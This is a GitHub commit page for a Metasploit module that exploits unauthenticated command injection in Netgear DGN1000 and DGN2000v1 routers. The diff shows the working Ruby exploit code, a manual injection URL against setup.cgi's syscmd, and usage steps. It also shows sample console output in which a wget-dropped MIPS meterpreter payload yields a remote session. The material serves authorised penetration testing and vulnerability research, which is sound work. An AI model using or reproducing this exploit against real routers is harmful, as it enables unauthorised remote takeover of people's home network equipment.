Skip to content

Commit

Permalink
netgear1000dng cleanup
Browse files Browse the repository at this point in the history
  • Loading branch information
@h00die
h00die committed Oct 23, 2017
1 parent eff94be commit 210f6f8
Show file tree
Hide file tree
Showing 2 changed files with 61 additions and 61 deletions.
11 changes: 7 additions & 4 deletions ...http/netgear_dgn1000_unauth_setup_exec.md → ...http/netgear_dgn1000_setup_unauth_exec.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
The module netgear_dgn1000_setup_unauth_exec module exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/&currentsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/&currentsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.

## Vulnerable Application

Expand All @@ -8,16 +8,17 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models

1. Start msfconsole
2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec`
3. Do : `set RHOST <RouterIP>`
4. Do : `set PAYLOAD <payload>`
3. Do : `set RHOST [RouterIP]`
4. Do : `set PAYLOAD [payload]`
5. Do : `run`
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session

## Scenarious

Sample output of a successfull exploitation should be look like this :

```msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
```
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
RHOST => 192.168.0.1
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
Expand Down Expand Up @@ -46,3 +47,5 @@ OS : (Linux 2.6.20-Amazon_SE)
Architecture : mips
Meterpreter : mipsbe/linux
meterpreter >
```

111 changes: 54 additions & 57 deletions modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,77 +21,74 @@ def initialize(info = {})
'Mumbai <https://github.com/realoriginal>', # module
'Robort Palerie <roberto@greyhats.it>' # vuln discovery
],
'References' =>
[
'References' => [
['EDB', '25978'],
],
'DisclosureDate' => 'Jun 5 2013',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', {} ]
],
))

end
'Targets' => [[ 'Automatic', {} ]],
))
end

def check
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET'
})
if res && res.headers['WWW-Authenticate']
auth = res.headers['WWW-Authenticate']
if auth =~ /DGN1000/
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end


Exploit::CheckCode::Unknown
def check
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET'
})
if res && res.headers['WWW-Authenticate']
auth = res.headers['WWW-Authenticate']
if auth =~ /DGN1000/
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end

def exploit
print_status("#{peer} - Connecting to target...")
def exploit
print_status("#{peer} - Connecting to target...")

unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
end
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
end

print_status("#{peer} - Exploiting target ....")
execute_cmdstager(
:flavor => :wget,
:linemax => 200,
:concat_operator => " && "
)
end
print_status("#{peer} - Exploiting target ....")
execute_cmdstager(
:flavor => :wget,
:linemax => 200,
:concat_operator => " && "
)
end

def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET',
'vars_get' => {
'next_file' => 'netgear.cfg',
'todo' => 'syscmd',
'cmd' => cmd.to_s,
'curpath' => '/',
'currentsetting.htm' => '1'
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET',
'vars_get' => {
'next_file' => 'netgear.cfg',
'todo' => 'syscmd',
'cmd' => cmd.to_s,
'curpath' => '/',
'currentsetting.htm' => '1'
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

0 comments on commit 210f6f8

Please sign in to comment.